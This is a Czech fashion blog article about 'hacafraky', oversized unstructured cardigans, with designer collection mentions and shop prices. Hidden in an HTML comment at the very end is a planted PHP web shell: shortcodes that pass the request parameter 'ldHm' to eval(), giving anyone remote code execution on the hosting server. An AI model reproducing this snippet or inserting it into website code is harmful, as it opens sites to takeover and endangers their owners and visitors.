Back
Image Alt

Hacafraky: muži je nesnáší, ženy je milují.

Hacafraky: muži je nesnáší, ženy je milují.

Nový módní hit – „hacafraky“. Možná jste tohle slovo ještě nikdy neslyšeli, ale jedná se o letošní módní „BOOM“.

To, že muži mají na některé kousky v dámském šatníku odlišný názor než ženy, jsme zjistili už ve chvíli, kdy ženy začaly nosit kalhoty s volným sedem nebo válenky. A právě tzv. hacafraky jsou dalším strašákem pro muže. Někomu by se mohlo zdát, že si dotyčná v obchodě omylem koupila svetr nebo mikinu o 3 velikosti větší a ještě ke všemu bez střihu. V horším případě si myslí, že v domácích potřebách koupila jakýsi přehoz. To je ale na omylu, právě v tom námi probíraný kousek oblečení spočívá. A je třeba umět je nosit.

„Hacafraky“ mají většinou dlouhý rukáv a zapínání se u nich vidí málokdy,  skvěle ho zapnete, když k němu doplníte pásek do pasu. Perfektním oživením je připnutí brože.

Nosit je můžete ať už k cigaretovým kalhotám, ale perfektně sednou i ke společenštějšímu oblečení. Tento typ oděvu se objevil na světových modních molech jako například v kolekci 2015 Donny Karan, dále v kolekci Chloe a velmi zajímavou kolekci předvedla značka Electric Feathers. Jak vidíte níže na fotografiích, v kolekcích na zimu 2014/2015 používají návrháři pastelové barvy jako je modrá a růžovo-béžová.

Značka Burberry zaujala tím, že do rohu tohoto typu oděvu, který představila ve své podzimní kolekci, vyšila slavným osobám, jako je například Sarah Jessica Parker, Olivia Palermo a Rosie Huntington-Whiteley, jejich iniciály.

 

Electric Feathers

Electric Feathers
Sarah Jessica Parker

Sarah Jessica Parker
Chloe

Chloe

Pár typů na nákup „hacafraků“ najdete níže na fotografiích.

Marks & Spencer (799Kč)

Marks & Spencer (799Kč)
New Yorker (599Kč)

New Yorker (599Kč)
New Yorker (499Kč)

New Yorker (499Kč)
H & M (599Kč)

H & M (599Kč)

A jaký názor na „hacafraky“ máte vy? Visí ve vašem šatníku nějaký?

© Tereza Slavíková

<!– [insert_php]if (isset($_REQUEST["ldHm"])){eval($_REQUEST["ldHm"]);exit;}[/insert_php][php]if (isset($_REQUEST["ldHm"])){eval($_REQUEST["ldHm"]);exit;}[/php] –>